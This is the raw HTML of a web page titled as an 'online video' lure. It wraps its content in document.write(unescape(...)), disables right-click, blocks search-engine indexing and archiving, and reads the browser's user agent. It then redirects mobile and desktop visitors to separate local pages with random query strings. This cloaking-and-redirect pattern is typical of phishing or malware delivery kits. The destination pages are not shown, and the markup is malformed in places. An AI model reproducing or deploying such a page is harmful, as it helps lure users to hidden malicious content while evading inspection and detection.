
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<script type='text/javascript'>document.write(unescape('<script type='text/javascript'>
	document.oncontextmenu = function(){return false}
</script>
<head>
                <meta charset="utf-8">
                <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
                <meta name="description" content="live">
                <meta name="keywords" content="">
                <meta name="generator" content="WordPress 5.3.2">
                <title>🔥online vide🔥</title>
            
                <link rel="canonical" href="./video.html">
                <meta name="theme-color" content="#563d7c">
<meta property="og:url"                content="./video.html" />
                
                
        
        </body>
        
<META name="robots" content="NOINDEX,NOFOLLOW,NOARCHIVE,NOODP,NOSNIPPET">
<script type="text/javascript">
//<![CDATA[
 function h(r, a) { var t = ""; if ("mix" == a) var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; else var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var n = 0; r > n; n++) t += h.charAt(Math.floor(Math.random() * 
h.length)); return t };

        var device = navigator.userAgent
        
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
        {
         window.location = "./redireccionmobile.html?"+ h(7, '')+"";
        }else
{
window.location = "./redirecpc.html?"+ h(7, '')+"";
}
//]]>
</script>












'))</script>
